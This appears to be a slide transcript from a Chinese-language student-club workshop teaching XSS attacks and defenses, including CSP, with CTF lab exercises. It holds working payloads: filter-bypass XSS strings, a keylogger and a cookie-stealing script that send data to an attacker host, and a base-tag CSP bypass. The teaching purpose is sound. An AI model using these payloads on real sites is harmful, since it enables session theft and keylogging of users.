XSS Everywhere@HackerSir 11th

Transcript

1. XSS Everywhere 講者：YuKAi

2. 今天的練習平台 ctf.hackersir.org Before Class

3. • 十屆學術部員、十一屆學術副部長 • Web 開發、Web Security • 會打些 Web CTF、競程

   • Github： https://github.com/KevinYu0515 Who am I

4. What is XSS 01 XSS CheatSheet 02 CSP 03 Outline

   CSP Bypass 04

5. What is XSS 01

6. What is XSS • Cross Site Script（not css） • XSS

   Type • Reflected XSS • Stored XSS • DOM-based XSS 將有 XSS 的網址給 使用者 使用者點入網頁 XSS 將使用者 資訊傳給駭客 網頁觸發 XSS

7. Reflected XSS • 立即見效、一次性的惡意腳本 http://example.com?who=<script>alert(1)</script> <h1>Hello, <script>alert(1)</script></h1>

8. Stored XSS • 儲存在伺服器的惡意腳本 <p>HackerSir</p> <p>Comment</p> <p><script>alert(1)</script></p> <script>alert(1)</script> Submit

9. DOM-based XSS • JavaScript 讀取導致的惡意腳本 填寫表單 JavaScript 根據表單的輸入 生成 HTML

   HTML生成觸發 XSS <div> <script>alert(1)</script> </div>

10. Self XSS • 自己執行自己的惡意腳本 • 通常需要社交工程提高其危害度 Hacker：

11. • 偷取敏感的資料（如 cookie） • 偽造請求 • 任何可以在瀏覽器做到的事 • 截圖 •

    點擊劫持（clickjacking） • 強制下載 • 鍵盤紀錄（keylogging） Why XSS danger

12. Easy Practice • <script>alert('xss')</script> • <a href=javascript:alert('xss')>1</a> • <img src=x

    onerror=alert('xss')> • <body onload=alert('xss')> • <input onfocus=write("xss") autofocus>

13. Easy Keylogger <img src=x onerror='document.onkeypress=e=>{window.k=(window.k||"")+String.fromCha rCode(e.which),fetch("[attacker.com]?k="+window.k)},this.remove()'> • 注意 • 上面那是一整行

    • request 抵達時間不一定，所以順序不一定正確

14. Lab1：XSS challenge 1 click link to practice

15. Blind XSS（以 Lab1 為例） 1. 抓 cookie 或其他可能儲存資料的地方（ex：localstorge） 2. 將

    cookie 丟到自己能看到的地方（ex：自己的伺服器） • 好用資源：requestbin、cloudflare <script>fetch("[attacker.com]?"+document.cookie)</script>

16. XSS CheatSheet 02

17. • 一般的使用者輸入框 <input>（POST method） • url 的 query 參數（GET method）

    Example： http://127.0.0.1:10001/?message=%3Cscript%3Ealert(%22xss%22)%3C/script%3E 伺服器接收到 message 參數是 %3Cscript%3Ealert(%22xss%22)%3C/script%3E 經過 url decode → <script>alert("xss")</script> Where can I test XSS

18. • <script> Tag • Event Handler • JavaScript pseudo-protocol Ways

    to Execute JavaScript

19. • 當特定事件觸發時，會執行後續的 JavaScript • <img src=x onerror=alert('xss')> • <body onload=alert('xss')>

    • <a onmouseover="alert(document.cookie)">xss link</a> Event Handler

20. • JavaScript 偽協議（javascript:） • <a href=javascript:alert('xss')>1</a> • <iframe src="javascript:alert(1)"></iframe> •

    <form action="javascript:alert(1)"> <button>submit</button> </form> • window.location='javascript:alert(1)' JavaScript pseudo-protocol

21. Just ban everything! (各種空格) • <img/src/onerror=alert(1)> • <img%0Asrc%0Aonerror=alert(1)> • <img%09src%09onerror=alert(1)>

    • %0A → \n • %09 → \t

22. Just ban everything! (關鍵字) • <ScRipT>alert(1)</ScRipT> • <a href=java&Tab;script:alert(1)>123<a> •

    <script src=data:text/javascript;base64,YWxlcnQoMSk=></script>

23. Just ban everything! (???) • 只有 { } [ ]

    + ! 也能觸發 JS • JSFuxk

24. Lab2：XSS challenge 2 click link to practice

25. Lab3：XSS challenge 3 click link to practice more blacklist

26. CheatSheet & Other Resource • PortSwigger XSS CheatSheet • Payload

    All The Things – XSS Injection • Web-CTF-CheatSheet

27. How to prevent XSS • Black List & White List

    • Length Limit • HTML Escape • Filter、Sanitize • More …

28. How to attck – Length Limit • <svg/onload=alert('xss')> • Tiny

    XSS

29. How to prevent XSS - Escape • PHP 的 htmlspecialchars

    • Other framework（ex：flask、jsp） 字符 HTML Entity & &amp; " &quot; ' &#039; 、&apos; < &lt; > &gt; This is some <b>bold</b> text. This is some &lt;b&gt;bold&lt;/b&gt; text. • Online HTML Entity Encoder/Decoder

30. How to prevent XSS - Filter • DOMPurify • 用來清除可疑

    XSS 的高效程式 • <img src=x onerror=alert(1)//> → <img src="x"> • <p>abc<iframe//src=jAva&Tab;script:alert(3)>def</p> → <p>abc</p> • Sanitizer API：瀏覽器內建清除 XSS 的程式

31. How to attack - Filter • Mutation XSS • 利用瀏覽器的渲染方式達到

    XSS <table><h1>hello</h1></table> <h1>hello</h1> <table></table>

32. How to attack - Filter • <noscript> • 利用瀏覽器會先將 <noscript>

    閉合的渲染方式 <noscript><p title="</noscript><img src=x onerror=alert(1)>"> <noscript><p title="</noscript> <img src=x onerror=alert(1)> "">"

33. Real World- WAF WAF（Ｗeb Application Firewall） • 監控 http 流量並進行控制、阻斷

    • 防禦已知漏洞的網頁攻擊 • Example：cloudflare、AWS WAF

34. Content Security Policy 03

35. • 白名單防禦機制 • 瀏覽器會根據 CSP 對特地資源進行控制 • 限制可以載入內容的網域 • 指定來源使用哪些協定

    What is CSP bad.com good.com https://bad.com/main.js https://good.com/main.js Not Allowed Allowed

36. • 在 response 中設定 • Content-Security-Policy: ... • 在 meta

    tag 設定 • <meta http-equiv="Content-Security-Policy" content="..."> • 在 Web Server 設定 How to use CSP

37. CSP：Response Example

38. • Example • default-src 'self' hackersir.org; • img-src 'self' https://www.fcu.edu.tw/;

    CSP 表示方式 • Directive Source1 Source2 Source3 … ;

39. • deafult-src：預設來源 • script-src：javascript 來源 • style-src：css 來源 • base-uri：於

    <base> tag 可使用的相對路徑 • connect-src：可被連接的來源（Ex：AJAX、fetch()、WebSocket） Directive • font-src：字形來源 • media-src：媒體來源（video、audio） • img-src：圖片來源

40. Source • 'none' 不允許任何來源的資源 • 'self' 允許來自同源網站（same origin）的資源 • data:

    允許 base64 endcode (或其他編碼）的圖片 • unsafe-inline 允許 inline JS 執行（ex：event handler、javascript:） • unsafe-eval 允許 JS 執行 eval() • nonce- 允許與 CSP 相同 nonce 的 script

41. • <a href="javascript:alert(1)">xss</a> • <svg/onload=alert("xss")> • <script>alert("xss")</script> script-src unsafe-inline

42. Content-Security-Policy: script-src 'nonce-hacker' • 允許 script ，但只限 nonce 也是 hacker

    的 script • <script nonce="hacker"> → 允許 • <script nonce="h0cker"> → 不允許 • More：Content Security Policy Reference script-src nonce-

43. CSP Bypass 04

44. • 可以用來評估 CSP 的 安全程度 • script-src 有被 bypass 的風險

    CSP Evaluator

45. • <base>：用來設定 url 相對路徑的參考位置 • 攻擊時機：有設定 script-src，但缺少 base-uri 的 CSP

    設定 • Example：<base href="https://attacker.com/"> • 將所有的 script 的參考位置改為 https://attacker.com/ CSP Bypass - <base> Tag

46. CSP Bypass - <base> Tag https://hello.com/script.js  原本應該從這個網址取得 js script

    <base href="https://attacker.com/">  改變相對路徑的參考網址 https://attacker.com/script.js  變成從攻擊者的網址取得 js script fetch("[attacker.com]?"+document.cookie) XSS

47. • CSP • default-src 'self'; • script-src 'self' 'nonce-YgD1ywsAlKRuCxYV’; •

    connect-src * • script- src 有設置 nonce，但缺少 base-uri 的設定 以 Lab4 為例 - Recon

48. • 發現裡面有引用 script.js 的 以 Lab4 為例 - Recon

49. 1. 自己架一個 server，並且新增一個 script.js 2. 使用反向代理，將本地的 server 代理出去 3. 輸入框輸入

    <base href="[attacker.com]"> 4. 用 curl POST /report 以 Lab4 為例 - Solve

50. • 攻擊時機：如果可以上傳任意檔案到 CSP 允許的網域 • Example：unpkg.com（開發人員愛好的公共 CDN 平台） • Real

    World Case： A Wormable XSS on HackMD! （by Orange） CSP Bypass - unsafe domain

51. Lab4：XSS challenge 4 click link to practice

52. More Web Security • PicoCTF • PortSwigger • DVWA •

    HackTrick - Pentesting Web • CTFTime • Hacker101
53. None